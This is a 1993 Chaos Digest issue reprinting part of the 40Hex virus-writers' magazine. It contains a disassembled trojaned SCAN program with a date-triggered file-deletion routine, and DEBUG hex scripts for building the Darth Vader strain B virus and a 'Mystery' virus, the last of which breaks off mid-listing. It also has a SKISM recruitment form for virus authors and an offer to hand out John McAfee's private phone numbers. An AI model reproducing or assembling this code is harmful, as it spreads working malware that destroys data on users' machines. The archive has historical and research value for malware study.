home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / KAOS1_39.ZIP / KAOS1-39
Text File  |  1993-06-02  |  28KB  |  811 lines

  1. Chaos Digest              Jeudi 27 Mai 1993        Volume 1 : Numero 39
  2.                            ISSN  1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.39 (27 Mai 1993)
  9. File 1--40H VMag Issue 1 Volume 3 #004(3)-008(1) (reprint)
  10.  
  11. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  12. available at no cost by sending a message to:
  13.                 linux-activists-request@niksula.hut.fi
  14. with a mail header or first line containing the following informations:
  15.                     X-Mn-Admin: join CHAOS_DIGEST
  16.  
  17. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  18. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  19. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  20. groups.
  21.  
  22. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
  23. 466893.  Back issues of ChaosD can be found on the Internet as part of the
  24. Computer underground Digest archives. They're accessible using anonymous FTP:
  25.  
  26.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  27.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  28.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  29.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  30.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  31.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  32.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  33.  
  34. CHAOS DIGEST is an open forum dedicated to sharing French information among
  35. computerists and to the presentation and debate of diverse views. ChaosD
  36. material may be reprinted for non-profit as long as the source is cited.
  37. Some authors do copyright their material, and they should be contacted for
  38. reprint permission.  Readers are encouraged to submit reasoned articles in
  39. French, English or German languages relating to computer culture and
  40. telecommunications.  Articles are preferred to short responses.  Please
  41. avoid quoting previous posts unless absolutely necessary.
  42.  
  43. DISCLAIMER: The views represented herein do not necessarily represent
  44.             the views of the moderators. Chaos Digest contributors
  45.             assume all responsibility for ensuring that articles
  46.             submitted do not violate copyright protections.
  47.  
  48. ----------------------------------------------------------------------
  49.  
  50. Date: Tue May 11 09:24:40 PDT 1993
  51. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
  52. Subject: File 1--40H VMag Issue 1 Volume 3 #004(3)-008(1) (reprint)
  53.  
  54. [suite du listing du SCAN de John McAfee]
  55.  
  56.  
  57. sub_39          proc    near
  58.                 push    ax
  59.                 mov     ah,2
  60.                 int     21h
  61.                 pop     ax
  62.                 retn
  63. sub_39          endp
  64.  
  65. sub_40          proc    near
  66.                 push    dx
  67.                 mov     dl,0Dh
  68.                 call    sub_39
  69.                 mov     dl,0Ah
  70.                 call    sub_39
  71.                 pop     dx
  72.                 retn
  73. sub_40          endp
  74.  
  75.                 db      0, 0, 0, 0, 0ACh, 29h
  76.                 db      0ADh, 29h, 0AEh, 29h, 0AFh, 29h
  77.                 db      0B0h, 29h, 0E9h, 6Ch, 2, 0E9h
  78.                 db      45h, 2, 0
  79.                 db      13 dup (0)
  80.                 db      0E9h, 60h, 0Dh, 0Dh, 0, 0
  81.                 db      0
  82.                 db      44h, 29h
  83.                 db      42 dup (0)
  84.                 db      0D2h, 7, 1, 1
  85.                 db      13 dup (0)
  86.                 db      3, 2, 0CFh, 0CEh, 0Dh, 0CDh
  87.                 db      0Dh
  88.                 db      79 dup (0)
  89.                 db      0Dh, 0Ah, 'Please enter the passw'
  90.                 db      'ord now: '
  91.                 db      0
  92.                 db      0Dh, 0Ah, 'This program requires '
  93.                 db      'DOS 3.00 or greater'
  94.                 db      7, 0Dh, 0Ah, 0, 5Ch, 2Ah
  95.                 db      2Eh, 2Ah, 0
  96.                 db      0Dh, 0Ah, 'Access denied'
  97.                 db      7, 0Dh, 0Ah, 0, 42h, 23h
  98.                 db      0
  99.                 db      305 dup (0)
  100.                 db      50h, 53h, 0A1h, 1, 1, 5
  101.                 db      3, 1, 0D1h, 0E8h, 0D1h, 0E8h
  102.                 db      0D1h, 0E8h, 0D1h, 0E8h, 8Bh, 0D8h
  103.                 db      8Ch, 0C8h, 3, 0C3h, 50h, 0B8h
  104.                 db      67h, 2, 50h, 0CBh, 5Bh, 58h
  105.                 db      2Eh, 0C6h, 6, 1Ah, 0, 0FFh
  106.                 db      2Eh, 8Ch, 6, 17h, 1, 2Eh
  107.                 db      0A3h, 19h, 1, 2Eh, 89h, 26h
  108.                 db      1Bh, 1, 2Eh, 8Ch, 16h, 1Dh
  109.                 db      1, 8Ch, 0C8h, 8Eh, 0D0h, 0BCh
  110.                 db      4Bh, 2, 2Eh, 0A1h, 19h, 1
  111.                 db      50h, 53h, 51h, 52h, 56h, 57h
  112.                 db      55h, 1Eh, 6, 8Ch, 0C8h, 8Eh
  113.                 db      0D8h, 8Eh, 0C0h, 0A0h, 1Bh, 0
  114.                 db      3Ch, 50h, 75h, 6, 0E8h, 6Ch
  115.                 db      0, 0EBh, 15h, 90h, 3Ch, 44h
  116.                 db      75h, 6, 0E8h, 7Ah, 0, 0EBh
  117.                 db      0Bh, 90h
  118. loc_80:
  119.                 cmp     al,4Ch
  120.                 jne     loc_81
  121.                 call    sub_42
  122.                 jmp     short loc_82
  123. loc_81:
  124.                 stc
  125. loc_82:
  126.                 jc      loc_85
  127.                 pop     es
  128.                 pop     ds
  129.                 pop     bp
  130.                 pop     di
  131.                 pop     si
  132.                 pop     dx
  133.                 pop     cx
  134.                 pop     bx
  135.                 cmp     byte ptr cs:data_7e,0
  136.                 je      loc_83
  137.                 mov     ax,cs:data_4e
  138.                 mov     ds:data_1e,ax
  139.                 mov     ax,cs:data_5e
  140.                 mov     ds:data_2e,ax
  141.                 mov     ax,100h
  142.                 mov     cs:data_4e,ax
  143.                 mov     cs:data_5e,ds
  144.                 jmp     short loc_84
  145. loc_83:
  146.                 mov     ax,cs
  147.                 sub     ax,cs:data_6e
  148.                 add     cs:data_5e,ax
  149. loc_84:
  150.                 pop     ax
  151.                 mov     ss,word ptr cs:[11Dh]
  152.                 mov     sp,word ptr cs:[11Bh]
  153.                 jmp     dword ptr cs:data_4e
  154. loc_85:
  155.                 mov     dx,104h
  156.                 call    sub_45
  157.                 mov     ax,4CFFh
  158.                 int     21h
  159.                 db      0BAh, 0AEh, 0, 0E8h, 0B6h, 0
  160.                 db      0C6h, 6, 58h, 0, 29h, 0BAh
  161.                 db      58h, 0, 0E8h, 79h, 0, 0E8h
  162.                 db      0C2h, 0, 0E8h, 8Ch, 0, 0C3h
  163.  
  164. sub_41          proc    near
  165.                 mov     ah,2Ah
  166.                 int     21h
  167.                 cmp     cx,ds:data_8e
  168.                 jb      loc_88
  169.                 cmp     dh,ds:data_9e
  170.                 jb      loc_88
  171.                 cmp     dl,ds:data_10e
  172.                 jb      loc_88
  173.                 mov     ah,30h
  174.                 int     21h
  175.                 cmp     al,3
  176.                 jae     loc_86
  177.                 mov     dx,0D0h
  178.                 call    sub_45
  179.                 clc
  180.                 jmp     short loc_88
  181.                 db      90h
  182. loc_86:
  183.                 push    ds
  184.                 push    es
  185.                 xor     al,al
  186.                 mov     cx,8000h
  187.                 mov     es,word ptr cs:copyright+1
  188.                 mov     es,es:data_3e
  189.                 xor     di,di
  190. loc_87:
  191.                 repne   scasb
  192.                 scasb
  193.                 jnz     loc_87
  194.                 add     di,2
  195.                 push    es
  196.                 pop     ds
  197.                 mov     dx,di
  198.                 mov     ah,41h
  199.                 int     21h
  200.                 clc
  201.                 pop     es
  202.                 pop     ds
  203. loc_88:
  204.                 cmc
  205.                 retn
  206. sub_41          endp
  207.  
  208. sub_42          proc    near
  209.                 mov     ah,1Ah
  210.                 mov     dx,83h
  211.                 int     21h
  212.                 mov     ah,4Eh
  213.                 mov     cx,8
  214.                 mov     dx,0FFh
  215.                 int     21h
  216.                 mov     si,0A1h
  217.                 mov     di,4Bh
  218.                 cld
  219. loc_89:
  220.                 lodsb
  221.                 scasb
  222.                 stc
  223.                 jnz     loc_ret_90
  224.                 or      al,al
  225.                 jnz     loc_89
  226.  
  227. loc_ret_90:
  228.                 retn
  229. sub_42          endp
  230.  
  231. sub_43          proc    near
  232.                 push    ax
  233.                 push    bx
  234.                 push    cx
  235.                 mov     ah,0Ah
  236.                 int     21h
  237.                 mov     bx,dx
  238.                 inc     bx
  239.                 mov     cl,[bx]
  240.                 xor     ch,ch
  241.                 jcxz    loc_92
  242.  
  243. locloop_91:
  244.                 inc     bx
  245.                 not     byte ptr [bx]
  246.                 loop    locloop_91
  247.  
  248. loc_92:
  249.                 pop     cx
  250.                 pop     bx
  251.                 pop     ax
  252.                 retn
  253. sub_43          endp
  254.  
  255. sub_44          proc    near
  256.                 push    cx
  257.                 push    si
  258.                 push    di
  259.                 mov     cl,ds:data_11e
  260.                 xor     ch,ch
  261.                 mov     si,59h
  262.                 mov     di,1Dh
  263.                 cld
  264.                 repe    cmpsb
  265.                 jz      loc_93
  266.                 stc
  267. loc_93:
  268.                 pop     di
  269.                 pop     si
  270.                 pop     cx
  271.                 retn
  272. sub_44          endp
  273.  
  274. sub_45          proc    near
  275.                 push    bx
  276.                 push    dx
  277.                 mov     bx,dx
  278. loc_94:
  279.                 mov     dl,[bx]
  280.                 or      dl,dl
  281.                 jz      loc_95
  282.                 call    sub_46
  283.                 inc     bx
  284.                 jmp     short loc_94
  285. loc_95:
  286.                 pop     dx
  287.                 pop     bx
  288.                 retn
  289. sub_45          endp
  290.  
  291. sub_46          proc    near
  292.                 push    ax
  293.                 mov     ah,2
  294.                 int     21h
  295.                 pop     ax
  296.                 retn
  297. sub_46          endp
  298.  
  299. sub_47          proc    near
  300.                 push    dx
  301.                 mov     dl,0Dh
  302.                 call    sub_46
  303.                 mov     dl,0Ah
  304.                 call    sub_46
  305.                 pop     dx
  306.                 retn
  307. sub_47          endp
  308.  
  309.                 db      0, 0ACh, 29h, 0ADh, 29h, 0AEh
  310.                 db      29h, 0AFh, 29h, 0B0h, 29h, 0E9h
  311.                 db      6Ch, 2
  312. loc_96:
  313.                 jmp     loc_97
  314.                 db      0
  315.                 db      13 dup (0)
  316.                 db      0E9h, 60h, 11h, 0Dh, 0, 0
  317.                 db      0
  318.                 db      44h, 29h
  319.                 db      42 dup (0)
  320.                 db      0D0h, 7, 6, 6
  321.                 db      13 dup (0)
  322.                 db      3, 2, 0CFh, 0C9h, 0Dh, 0CFh
  323.                 db      0Dh
  324.                 db      79 dup (0)
  325.                 db      0Dh, 0Ah, 'Please enter the passw'
  326.                 db      'ord now: '
  327.                 db      0
  328.                 db      0Dh, 0Ah, 'This program requires '
  329.                 db      'DOS 3.00 or greater'
  330.                 db      7, 0Dh, 0Ah, 0, 5Ch, 2Ah
  331.                 db      2Eh, 2Ah, 0
  332.                 db      0Dh, 0Ah, 'Access denied'
  333.                 db      7, 0Dh, 0Ah, 0, 42h, 23h
  334.                 db      0
  335.                 db      305 dup (0)
  336. loc_97:
  337.                 push    ax
  338.                 push    bx
  339.                 mov     ax,word ptr ds:[101h]
  340.                 add     ax,103h
  341.                 shr     ax,1
  342.                 shr     ax,1
  343.                 shr     ax,1
  344.                 shr     ax,1
  345.                 mov     bx,ax
  346.                 mov     ax,cs
  347.                 add     ax,bx
  348.                 push    ax
  349.                 mov     ax,267h
  350.                 push    ax
  351.                 retf
  352.                 db      5Bh, 58h, 2Eh, 0C6h, 6, 1Ah
  353.                 db      0, 0FFh, 2Eh, 8Ch, 6, 17h
  354.                 db      1, 2Eh, 0A3h, 19h, 1, 2Eh
  355.                 db      89h, 26h, 1Bh, 1, 2Eh, 8Ch
  356.                 db      16h, 1Dh, 1, 8Ch, 0C8h, 8Eh
  357.                 db      0D0h, 0BCh, 4Bh, 2, 2Eh, 0A1h
  358.                 db      19h, 1, 50h, 53h, 51h, 52h
  359.                 db      56h, 57h, 55h, 1Eh, 6, 8Ch
  360.                 db      0C8h, 8Eh, 0D8h, 8Eh, 0C0h, 0A0h
  361.                 db      1Bh, 0, 3Ch, 50h, 75h, 6
  362.                 db      0E8h, 6Ch, 0, 0EBh, 15h, 90h
  363.                 db      3Ch, 44h, 75h, 6, 0E8h, 7Ah
  364.                 db      0, 0EBh, 0Bh, 90h
  365. loc_98:
  366.                 cmp     al,4Ch
  367.                 jne     loc_99
  368.                 call    sub_49
  369.                 jmp     short loc_100
  370. loc_99:
  371.                 stc
  372. loc_100:
  373.                 jc      loc_103
  374.                 pop     es
  375.                 pop     ds
  376.                 pop     bp
  377.                 pop     di
  378.                 pop     si
  379.                 pop     dx
  380.                 pop     cx
  381.                 pop     bx
  382.                 cmp     byte ptr cs:data_7e,0
  383.                 je      loc_101
  384.                 mov     ax,cs:data_4e
  385.                 mov     ds:data_1e,ax
  386.                 mov     ax,cs:data_5e
  387.                 mov     ds:data_2e,ax
  388.                 mov     ax,100h
  389.                 mov     cs:data_4e,ax
  390.                 mov     cs:data_5e,ds
  391.                 jmp     short loc_102
  392. loc_101:
  393.                 mov     ax,cs
  394.                 sub     ax,cs:data_6e
  395.                 add     cs:data_5e,ax
  396. loc_102:
  397.                 pop     ax
  398.                 mov     ss,word ptr cs:[11Dh]
  399.                 mov     sp,word ptr cs:[11Bh]
  400.                 jmp     dword ptr cs:data_4e
  401. loc_103:
  402.                 mov     dx,104h
  403.                 call    sub_52
  404.                 mov     ax,4CFFh
  405.                 int     21h
  406.                 db      0BAh, 0AEh, 0, 0E8h, 0B6h, 0
  407.                 db      0C6h, 6, 58h, 0, 29h, 0BAh
  408.                 db      58h, 0, 0E8h, 79h, 0, 0E8h
  409.                 db      0C2h, 0, 0E8h, 8Ch, 0, 0C3h
  410.  
  411. sub_48          proc    near
  412.                 mov     ah,2Ah
  413.                 int     21h
  414.                 cmp     cx,ds:data_8e
  415.                 jb      loc_106
  416.                 cmp     dh,ds:data_9e
  417.                 jb      loc_106
  418.                 cmp     dl,ds:data_10e
  419.                 jb      loc_106
  420.                 mov     ah,30h
  421.                 int     21h
  422.                 cmp     al,3
  423.                 jae     loc_104
  424.                 mov     dx,0D0h
  425.                 call    sub_52
  426.                 clc
  427.                 jmp     short loc_106
  428.                 db      90h
  429. loc_104:
  430.                 push    ds
  431.                 push    es
  432.                 xor     al,al
  433.                 mov     cx,8000h
  434.                 mov     es,word ptr cs:copyright+1
  435.                 mov     es,es:data_3e
  436.                 xor     di,di
  437. loc_105:
  438.                 repne   scasb
  439.                 scasb
  440.                 jnz     loc_105
  441.                 add     di,2
  442.                 push    es
  443.                 pop     ds
  444.                 mov     dx,di
  445.                 mov     ah,41h
  446.                 int     21h
  447.                 clc
  448.                 pop     es
  449.                 pop     ds
  450. loc_106:
  451.                 cmc
  452.                 retn
  453. sub_48          endp
  454.  
  455. sub_49          proc    near
  456.                 mov     ah,1Ah
  457.                 mov     dx,83h
  458.                 int     21h
  459.                 mov     ah,4Eh
  460.                 mov     cx,8
  461.                 mov     dx,0FFh
  462.                 int     21h
  463.                 mov     si,0A1h
  464.                 mov     di,4Bh
  465.                 cld
  466. loc_107:
  467.                 lodsb
  468.                 scasb
  469.                 stc
  470.                 jnz     loc_ret_108
  471.                 or      al,al
  472.                 jnz     loc_107
  473.  
  474. loc_ret_108:
  475.                 retn
  476. sub_49          endp
  477.  
  478. sub_50          proc    near
  479.                 push    ax
  480.                 push    bx
  481.                 push    cx
  482.                 mov     ah,0Ah
  483.                 int     21h
  484.                 mov     bx,dx
  485.                 inc     bx
  486.                 mov     cl,[bx]
  487.                 xor     ch,ch
  488.                 jcxz    loc_110
  489.  
  490. locloop_109:
  491.                 inc     bx
  492.                 not     byte ptr [bx]
  493.                 loop    locloop_109
  494.  
  495. loc_110:
  496.                 pop     cx
  497.                 pop     bx
  498.                 pop     ax
  499.                 retn
  500. sub_50          endp
  501.  
  502. sub_51          proc    near
  503.                 push    cx
  504.                 push    si
  505.                 push    di
  506.                 mov     cl,ds:data_11e
  507.                 xor     ch,ch
  508.                 mov     si,59h
  509.                 mov     di,1Dh
  510.                 cld
  511.                 repe    cmpsb
  512.                 jz      loc_111
  513.                 stc
  514. loc_111:
  515.                 pop     di
  516.                 pop     si
  517.                 pop     cx
  518.                 retn
  519. sub_51          endp
  520.  
  521. sub_52          proc    near
  522.                 push    bx
  523.                 push    dx
  524.                 mov     bx,dx
  525. loc_112:
  526.                 mov     dl,[bx]
  527.                 or      dl,dl
  528.                 jz      loc_113
  529.                 call    sub_53
  530.                 inc     bx
  531.                 jmp     short loc_112
  532. loc_113:
  533.                 pop     dx
  534.                 pop     bx
  535.                 retn
  536. sub_52          endp
  537.  
  538. sub_53          proc    near
  539.                 push    ax
  540.                 mov     ah,2
  541.                 int     21h
  542.                 pop     ax
  543.                 retn
  544. sub_53          endp
  545.  
  546. sub_54          proc    near
  547.                 push    dx
  548.                 mov     dl,0Dh
  549.                 call    sub_53
  550.                 mov     dl,0Ah
  551.                 call    sub_53
  552.                 pop     dx
  553.                 retn
  554. sub_54          endp
  555.  
  556.                 db      0F0h, 0FDh, 0C5h, 0AAh, 0FFh, 0F0h
  557.                 db      8Dh, 6Dh, 0B2h
  558.                 db      73h
  559.  
  560. seg_a           ends
  561.  
  562.                 end     start
  563.  
  564. +++++
  565.  
  566. 40Hex Issue 3                                                      0005
  567.  
  568.                   Application For Membership To SKISM
  569.  
  570.  
  571.     SKISM is quickly becoming one of the largest virus creators/
  572.     distributers in America.  Part of getting bigger is branching
  573.     out in new directions and getting more members.
  574.  
  575.     If you wish to apply for membership to SKISM or if you want
  576.     your board to become to become a SKISM distribution site
  577.     fill out the application below and upload it to one of the
  578.     SKISM home bases listed in file one of this archive.
  579.  
  580.     Keep in mind, from the start of the group SKISM we have been
  581.     virus authors, not trojan, bomb, or any other such distructive
  582.     mechanism.  The entire purpose of SKISM is virus reserch, to
  583.     better understand the situation today with computer viruses.
  584.  
  585.     Therefore trojan and bomb authors shall apply elsewere, when
  586.     you brush up your work, come back.  No disrespect intended.
  587.  
  588. -------------------------------------------------------------------------
  589.  
  590.                        Application For Membership
  591.  
  592.  
  593. I am interested in becoming
  594.  
  595. ___ A SKISM Member
  596. ___ A SKISM Distribution Site Sysop
  597.  
  598.  
  599. Handle:      ________________
  600. Aliases:     ________________
  601. First Name:  ________________  (Used only for verification)
  602.  
  603.  
  604. Have you ever written a computer virus(es)? ___
  605. If yes name it/them: _______________________________________
  606.                      _______________________________________
  607.  
  608. Programming Languages you know: ____________________________ Know Well
  609.                                 ____________________________    :
  610.                                 ____________________________    :
  611.                                 ____________________________ Hardly Know
  612.  
  613. Are you a sysop of a BBS?  ___
  614. If yes leave the vitals:
  615.                          BBS Name: _________________________
  616.                          Dialup:   _________________________
  617.                          State:    _________________________
  618.                          Running:  example: Telegard._______
  619.  
  620. Are you in any way connected to and law enforcment agency? ___
  621. Do you realize that being untruthfull to the above question
  622. waviers all legal matters: ____
  623. Are you in anyway connected to any software company? ___
  624.  
  625. List three people you know (handles) : _________________
  626.                                        _________________
  627.                                        _________________
  628.  
  629. List three BBS that you have elite access to:
  630.  
  631. Name: _____________________   Dialup: _______________________
  632. Name: _____________________   Dialup: _______________________
  633. Name: _____________________   Dialup: _______________________
  634.  
  635. Thank you.
  636.  
  637. Please upload this applcation to one of the SKISM distribution site
  638. mentioned in the first file of this archive.
  639.  
  640. +++++
  641.  
  642. 40Hex Issue 3                                                      0006
  643.  
  644.                                Virus News
  645.  
  646. 10/91
  647. -----
  648.  
  649. Well the virus world is going as good as ever, dispite the over 20
  650. virus scanners/removers out there.
  651.  
  652. The October 28th issue of PC-Magazine did a huge artical on the newest
  653. virus scanner/defense systems.  Mentioned in the artical were SKISM-1
  654. and Captian Trips.
  655.  
  656. There is a new catagory of viruses out there, DIR-2 viruses.  Havent
  657. located one as of yet, but hope to in the near future.
  658.  
  659. Bogus SCANS continue to surface in the public domain.  As if SCAN 82
  660. was not played with enough, there have been many reports of bogus
  661. versions SCAN 84.  Most of which contian trojan bombs and will distroy
  662. the FAT table or boot sector of you hard disk upon execution.
  663.  
  664. I have the unreleased phone numbers of John Mcafee. Including his
  665. private office, home, and fax numbers.  Get a hold of me somehow and I
  666. will get them to you.
  667.  
  668. Theres a bogus version of the Red Cross virus going around on h/p
  669. boards.  The first command is to terminate the program.  Things people
  670. do for credit these days.
  671.  
  672. In case you haven't yet heard Patti Hoffmans VSUM, virus information
  673. summary is now a giant hyper-text database.  It's really a good
  674. program, check it out.  Can't wait to see a bogus version of that
  675. going around.
  676.  
  677. That's it for no - till later.
  678.  
  679. +++++
  680.  
  681. 40Hex Issue 3                                                      0007
  682.  
  683.                      The Darth Vader Virus Strain B
  684.  
  685.      The Darth Vader virus is pretty cool because it is a little
  686.      differnt than most other viruses.  Instead of going resident
  687.      and infecting all programs run, it infects the stack space
  688.      of all .COM files, as they are copied.  Pretty cool, huh?
  689.  
  690.      This virus only infects .COM files with a stack space equal
  691.      to its own size.
  692.  
  693.      It's orgin is Bulgeria, hmmm, has Bulgeria become the virus
  694.      captial of the world all of a sudden???
  695.  
  696.      Well here it is, enjoy.
  697.  
  698. ----------------------------------------------------------------------------
  699. n darth-2.com
  700. e 0100  E8 00 00 5E 83 EE 03 89 36 F0 00 A3 FE 00 31 C0
  701. e 0110  8E D8 8E 06 AE 00 B8 00 90 8E D8 31 FF 47 81 FF
  702. e 0120  00 0F 77 58 57 31 F6 B9 58 01 F3 A6 5F E3 02 EB
  703. e 0130  EC 2E 8B 36 F0 00 2E 89 3E F2 00 0E 1F B9 58 01
  704. e 0140  F3 A4 06 1F 8B F7 46 74 33 56 AD 93 AC 81 FB 36
  705. e 0150  FF 74 03 5E EB F0 3C 16 75 F9 5E 56 2E 8B 3E F2
  706. e 0160  00 89 3E 04 00 81 C7 41 01 A5 A5 A4 5F B0 9A AA
  707. e 0170  B8 95 00 2E 03 06 F2 00 AB 8C C0 AB 0E 0E 1F 07
  708. e 0180  BF 00 01 57 8B 36 F0 00 81 C6 47 01 A5 A4 A1 FE
  709. e 0190  00 C3 E9 9C 00 2E 8C 1E 0A 00 2E 89 16 0C 00 2E
  710. e 01A0  89 0E 0E 00 50 53 51 06 56 57 80 FC 40 75 E3 81
  711. e 01B0  F9 68 01 72 DD B8 20 12 CD 2F 26 8A 1D B8 16 12
  712. e 01C0  CD 2F 83 C7 28 0E 1F BE 4A 01 03 36 04 00 B9 03
  713. e 01D0  00 F3 A6 75 5C 1E 07 2E 8E 1E 0A 00 2E 8B 36 0C
  714. e 01E0  00 BF 47 01 2E 03 3E 04 00 A5 A4 B8 00 90 8E C0
  715. e 01F0  2E 8B 0E 0E 00 31 FF 46 49 74 36 51 56 B9 58 01
  716. e 0200  F3 A6 5E E3 03 59 EB ED 59 56 1E 2E 8E 06 0A 00
  717. e 0210  2E 8B 3E 0C 00 B0 E9 AA 2E 2B 36 0C 00 83 EE 03
  718. e 0220  8B C6 AB 07 5F 0E 1F 2E 8B 36 04 00 B9 58 01 F3
  719. e 0230  A4 5F 5E 07 59 5B 58 2E 8B 16 0C 00 2E 8E 1E 0A
  720. e 0240  00 00 00 00 00 00 CB CD 20 90 43 4F 4D 44 61 72
  721. e 0250  74 68 20 56 61 64 65 72 90 1A 1A 1A 1A 1A 1A 1A
  722. rcx
  723. 159
  724. w
  725. q
  726.  
  727. +++++
  728.  
  729. 40Hex Issue 3                                                        0008
  730.  
  731.                              Mystery Virus
  732.  
  733.  
  734.         Actually I do know what this virus is, but being Halloween time
  735.         and all I thought I'd let you find out for yourself.
  736.  
  737. -------------------------------------------------------------------------
  738. n mystery.com
  739. e 0100  E9 4B 00 CD 21 2E 56 53 2E 00 8C C3 83 C3 10 2E
  740. e 0110  03 9C 3C 07 2E 89 9C 32 00 2E 8B 9C 3A 07 2E 89
  741. e 0120  9C 30 00 8C C3 83 C3 10 2E 03 9C 40 07 8E D3 2E
  742. e 0130  8B A4 3E 07 EA 00 00 00 00 BF 00 01 81 C6 42 07
  743. e 0140  A4 A5 8B 26 06 00 33 DB 53 FF 64 F5 00 07 E8 00
  744. e 0150  00 5E 83 EE 4C FC 2E 81 BC 42 07 4D 5A 74 0E FA
  745. e 0160  8B E6 81 C4 FC 08 FB 3B 26 06 00 73 CC 2E C6 84
  746. e 0170  76 00 C5 50 06 56 1E 0E 1F B8 00 C5 CD 21 3D 31
  747. e 0180  67 75 04 07 E9 AB 00 07 B4 49 CD 21 BB FF FF B4
  748. e 0190  48 CD 21 81 EB E8 00 73 03 E9 96 00 8C C1 F9 13
  749. e 01A0  CB B4 4A CD 21 BB E7 00 F9 26 19 1E 02 00 06 8E
  750. e 01B0  C1 B4 4A CD 21 8C C0 48 8E D8 C7 06 01 00 08 00
  751. e 01C0  E8 E1 05 8B D8 8B CA 1F 8C D8 E8 D7 05 03 06 06
  752. e 01D0  00 83 D2 00 2B C3 1B D1 72 04 29 06 06 00 1E 0E
  753. e 01E0  2E C6 84 F5 00 62 33 FF 8E DF 1F B9 95 07 90 F3
  754. e 01F0  A4 26 C7 06 49 07 00 00 B8 00 62 CD 21 8E DB 8B
  755. e 0200  3E 08 00 8B DF 8B 3E 06 00 47 8E DB 8B 5D 02 8B
  756. e 0210  3D 83 C7 1A 26 89 1E 93 07 8C C1 8E C3 FA B8 EA
  757. e 0220  00 AA B8 38 03 AB 8B C1 AB 8E C1 26 89 3E 91 07
  758. e 0230  FB 07 B8 00 2A CD 21 3A D6 74 14 E9 8D 00 69 62
  759. e 0240  6D 40 40 53 4E 53 20 20 20 20 20 20 20 20 20 0E
  760. e 0250  1F 5E 56 2E C6 84 68 01 CD B0 02 B9 01 00 33 D2
  761. e 0260  2E C6 84 69 01 25 8B DE 81 C3 26 03 56 2D 4C 5A
  762. e 0270  5E 72 58 06 1E 07 2E C6 84 B1 01 26 2E C6 84 B0
  763. e 0280  01 CD 8B FB 81 C7 F3 01 56 8B F3 83 C6 0B B9 09
  764. e 0290  00 83 3C 00 74 16 F3 A4 5E 8B FB 83 C7 03 56 81
  765. e 02A0  C6 39 01 B9 11 00 AC 2C 20 AA E2 FA 5E 56 33 D2
  766. e 02B0  B0 02 B9 01 00 0C 1B 58 5E 07 72 0F 0E 1F 58 1F
  767. e 02C0  B8 03 C5 CD 21 58 B8 00 4C CD 21 5E 07 58 06 1F
  768. e 02D0  2E 81 BC 42 07 4D 5A 75 03 E9 2E FE E9 5A FE 50
  769. e 02E0  53 51 52 56 57 06 1E 0E 1F 80 3E 39 07 01 75 2A
  770. e 02F0  B8 03 00 CD 10 C6 06 35 07 09 C6 06 38 07 00 C6
  771. e 0300  06 36 07 00 C6 06 37 07 00 C6 06 33 07 00 C6 06
  772. e 0310  39 07 00 90 C7 06 31 07 D2 06 80 3E 33 07 01 75
  773. e 0320  03 E9 D5 00 80 3E 30 07 00 74 07 FE 0E 30 07 E9
  774. e 0330  C7 00 8B 1E 31 07 83 3F FF 75 13 E4 61 24 FC E6
  775. e 0340  61 C6 06 34 07 00 C6 06 33 07 01 E9 AB 00 80 3E
  776. e 0350  34 07 01 75 03 E9 92 00 B0 B6 E6 43 8A 47 02 A2
  777. e 0360  30 07 C6 06 34 07 01 8B 1F B8 DD 34 BA 12 00 F7
  778. e 0370  F3 E6 42 8A C4 E6 42 E4 61 0C 03 E6 61 83 06 31
  779. e 0380  07 03 8A 36 37 07 8D 36 A5 06 B9 03 00 80 3E 35
  780. e 0390  07 0F 7E 09 C6 06 35 07 09 90 EB 0E 90 80 3E 35
  781. e 03A0  07 09 73 06 C6 06 35 07 0F 90 8A 1E 35 07 8A 16
  782. e 03B0  36 07 E8 4D 00 FE C6 E2 F1 80 06 36 07 02 80 3E
  783. e 03C0  38 07 01 74 19 80 3E 37 07 15 77 0C 80 06 37 07
  784. e 03D0  02 FE 06 35 07 EB 22 90 C6 06 38 07 01 90 80 2E
  785. e 03E0  37 07 02 FE 0E 35 07 EB 10 90 8A 07 A2 30 07 C6
  786. e 03F0  06 34 07 00 83 06 31 07 01 1F 07 5F 5E 5A 59 5B
  787. e 0400  58 CF 51 B7 00 B4 02 CD 10 B9 01 00 AC 0A C0 74
  788. e 0410  18 2C 20 3C DF 74 04 3C DC 75 06 B9 22 00 80 C2
  789. e 0420  21 B4 09 CD 10 FE C2 EB DC 59 C3 B0 03 CF E8 39
  790. e 0430  01 E8 49 03 9D 80 FC 68 2E FF 2E 91 07 55 8B EC
  791. e 0440  FF 76 06 9D 5D 9C FC 3D 00 4B 74 E2 80 FC 3C 74
  792. e 0450  0A 80 FC 3E 74 4A 80 FC 5B 75 6F 2E 83 3E 49 07
  793. e 0460  00 74 03 E9 A6 00 E8 B9 00 74 03 E9 9E 00 E8 0C
  794. e 0470  03 9D E8 EB 00 73 03 E9 99 00 9C 06 0E 07 56 57
  795. e 0480  51 50 BF 49 07 AB 8B F2 B9 41 00 AC AA 84 C0 74
  796. e 0490  07 E2 F8 26 89 0E 49 07 58 59 5F 5E 07 9D 73 73
  797. e 04A0  2E 3B 1E 49 07 75 65 85 DB 74 61 E8 CF 02 9D E8
  798. e 04B0  AE 00 72 5F 9C 1E 0E 1F 52 BA 4B 07 E8 AB 00 2E
  799. e 04C0  C7 06 49 07 00 00 5A 1F EB D3 80 FC 3D 74 35 80
  800. e 04D0  FC 43 74 30 80 FC 56 74 2B 80 FC C5 75 2E 3C 03
